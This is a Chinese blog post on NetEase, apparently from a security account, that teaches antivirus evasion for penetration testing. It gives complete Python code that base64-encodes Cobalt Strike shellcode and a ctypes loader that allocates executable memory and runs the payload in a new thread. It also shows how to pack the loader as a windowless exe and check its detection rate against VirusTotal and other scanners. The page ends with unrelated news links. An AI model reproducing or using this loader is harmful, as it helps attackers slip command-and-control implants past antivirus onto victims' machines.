网易首页 > 网易号 > 正文 申请入驻

免杀 - shellcode简单混淆BypassAv

0
分享至

前言

在进行渗透测试过程中,往往会遇到主机有杀软,导致我们的木马被查杀,那么我们就得想办法绕过杀软进行上线Cobalt strike 或者 Metasploiit

环境: Cobalt strike 4.1 Python pyinstaller

何为shellcode?

百度百科是这样介绍它的:

“shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名”

何为shellcode混淆?

其实就是把我们的shellcode进行加密:如base64,AES等等

实现过程

1、生成shellcode 2、把shellcode加密 3、构造shellcode加载器 4、shellcode加载器把我们加密过后的shellcode解密 5、执行程序,上线C2

下面我也直观的列举了一幅图来说明,如下

利用cobalt strike生成shellcode

生成Python shellcode x64

会得到这样一个内容文件

简单处理payload.py shellcode文件

1、你可以直接把双引号里面的内容复制出来

2、写代码提取出来

这里我用的第二种,附自己写的垃圾代码

这样就能简单处理我们的shellcode文件

对我们提取出来的shellcode进行加密

这里我使用base64加密

1、可以直接使用在线的base64网站加密


https://base64.us/

2、自写代码进行加密

这里使用Python base64库,附代码

# coding=utf-8import base64# 读取shellcode文件shellcode = open('payload.py')shellcode = shellcode.read()# 取出shellcode内容s1 = shellcode.find("\"")+1s2 = shellcode.rfind("\"")shellcode = shellcode[s1:s2]# print(shellcode)# 把shellcode base64加密并写入base64.txt文件base64_shellcode = base64.b64encode(shellcode.encode('UTF-8'))with open('base64.txt', 'wb') as shell:shell.write(base64_shellcode)
编写加载器

这里直接附代码

import base64import codecsimport ctypesshellcode = ""shellcode = base64.b64decode(shellcode)shellcode = codecs.escape_decode(shellcode)[0]shellcode = bytearray(shellcode)# 设置VirtualAlloc返回类型为ctypes.c_uint64ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64# 申请内存ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))# 放入shellcodebuf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr),buf,ctypes.c_int(len(shellcode)))# 创建一个线程从shellcode放置位置首地址开始执行handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))# 等待上面创建的线程运行完ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))

把我们加密过后的shellcode放进shellcode = ""里

测试,能否上线

利用pyinstaller打包成exe
pyinstaller -F bypassav.py -w

生成exe

测试能否上线

测试免杀率

1、本地360

2、微步在线

3、VT查杀

结尾

这篇只是一个引子,大家还可以考虑

1、对我们生成的exe再进行混淆

2、分离shellcode

后续有时间会给大家写一篇分离shellcode,上述过程皆可进行自动化生成,我已经实现到自己的平台了

特别声明:以上内容(如有图片或视频亦包括在内)为自媒体平台“网易号”用户上传并发布,本平台仅提供信息存储服务。

Notice: The content above (including the pictures and videos if any) is uploaded and posted by a user of NetEase Hao, which is a social media platform and only provides information storage services.

相关推荐
热点推荐
巴基斯坦全面宣战,中亚格局或改写,印度最慌!

巴基斯坦全面宣战,中亚格局或改写,印度最慌!

达文西看世界
2026-02-27 16:30:28
伊朗的战术奏效了!开始使用“疲劳战术”应对美以的打击

伊朗的战术奏效了!开始使用“疲劳战术”应对美以的打击

狸花小咪
2026-03-03 17:45:02
美国终于怕了,比稀土更致命的王牌,终于出手了,万斯:中国要冷静

美国终于怕了,比稀土更致命的王牌,终于出手了,万斯:中国要冷静

青烟小先生
2026-03-02 10:48:12
伊朗将回归世俗社会

伊朗将回归世俗社会

八桂知事
2026-03-02 14:07:58
中国终于承认双重国籍? 原来真有人靠这个, 拿两本护照

中国终于承认双重国籍? 原来真有人靠这个, 拿两本护照

澳微Daily
2026-03-03 14:48:25
厦门一男子向女友转账20万元,女友提出分手后其要求全额返还......

厦门一男子向女友转账20万元,女友提出分手后其要求全额返还......

潇湘晨报
2026-03-03 17:06:40
港股“子”曰 | 全球最牛股市竟然跌“熔断”了

港股“子”曰 | 全球最牛股市竟然跌“熔断”了

每日经济新闻
2026-03-03 17:20:04
这3个生肖马年迎来事业黄金期,赚钱思路全开,稳赚不赔!

这3个生肖马年迎来事业黄金期,赚钱思路全开,稳赚不赔!

毅谈生肖
2026-03-02 17:13:14
网友询问:哈梅内伊为何不给民主发枪抵抗,评论区炸锅,舆论撕裂

网友询问:哈梅内伊为何不给民主发枪抵抗,评论区炸锅,舆论撕裂

眼光很亮
2026-03-01 16:12:51
斯卢茨基亮相申花新赛季出征仪式,已发声做出重要决定,赢得点赞

斯卢茨基亮相申花新赛季出征仪式,已发声做出重要决定,赢得点赞

振刚说足球
2026-03-03 17:57:29
林志玲这蕾丝没几个人能顶住吧

林志玲这蕾丝没几个人能顶住吧

东方不败然多多
2026-03-03 11:26:43
巴基斯坦正式宣战!两小时内遭强攻,致命导火索,中方早就提醒过

巴基斯坦正式宣战!两小时内遭强攻,致命导火索,中方早就提醒过

历史有些冷
2026-03-03 18:40:03
媒体爆料:梅威瑟如今净资产只剩1亿美元,远远不及老对手帕奎奥

媒体爆料:梅威瑟如今净资产只剩1亿美元,远远不及老对手帕奎奥

郝小小看体育
2026-03-03 01:11:07
为什么感觉美国在走向衰落?那是因为你是中国人

为什么感觉美国在走向衰落?那是因为你是中国人

扶苏聊历史
2025-12-19 10:02:54
美以袭击伊朗,中东航运海运停滞;中国外贸人称伊朗客户订2000个扫码机价值26万美金,现在他生死未知,“生意可以等,生命安全最重要”

美以袭击伊朗,中东航运海运停滞;中国外贸人称伊朗客户订2000个扫码机价值26万美金,现在他生死未知,“生意可以等,生命安全最重要”

大象新闻
2026-03-03 13:47:03
穆雷狂轰45分连刷四纪录!近三战109分势头猛烈 阿帅:他扛起球队

穆雷狂轰45分连刷四纪录!近三战109分势头猛烈 阿帅:他扛起球队

颜小白的篮球梦
2026-03-03 18:14:27
梅西106个禁区外远射!70个任意球!过去三年不到5个点球!

梅西106个禁区外远射!70个任意球!过去三年不到5个点球!

氧气是个地铁
2026-03-02 23:07:44
姐姐摸了下弟弟的小脚丫,我直接破防了!这画面也太暖了吧!

姐姐摸了下弟弟的小脚丫,我直接破防了!这画面也太暖了吧!

王二哥老搞笑
2026-02-28 04:28:55
当冲击来临:为何首当其冲的是苏州?“第一地级市”也慌了

当冲击来临:为何首当其冲的是苏州?“第一地级市”也慌了

小陆搞笑日常
2026-03-03 07:43:00
48小时送走哈梅内伊:令人恐怖的技术代差,现代战争的形态变了

48小时送走哈梅内伊:令人恐怖的技术代差,现代战争的形态变了

黑企鹅观察
2026-03-01 14:40:34
2026-03-03 19:59:00
重生信息安全
重生信息安全
专注网络安全行业
45文章数 184关注度
往期回顾 全部

科技要闻

拥抱AI的"牛马":边提效边自嘲"自费"上班

头条要闻

有分析称中方或采取更大胆行动宣示领土主张 中方回应

头条要闻

有分析称中方或采取更大胆行动宣示领土主张 中方回应

体育要闻

35轮后积分-7,他们遭遇史上最早的降级

娱乐要闻

谢娜霸气护夫:喊话薛之谦给张杰道歉

财经要闻

特朗普“不惜一切”!全球股债齐崩

汽车要闻

第一梯队辅助驾驶加持 iCAR V27定档3月13日上市

态度原创

家居
数码
艺术
教育
军事航空

家居要闻

万物互联 享科技福祉

数码要闻

荣耀MagicOS公布焕新状态栏,在线征集用户意见

艺术要闻

Nihad Aghazada:当代阿塞拜疆画家

教育要闻

2026开学季优惠 | 平时学习忙,没时间看书,语文越学越吃力?一招轻松解决!

军事要闻

伊朗:击中美空军基地大楼

无障碍浏览 进入关怀版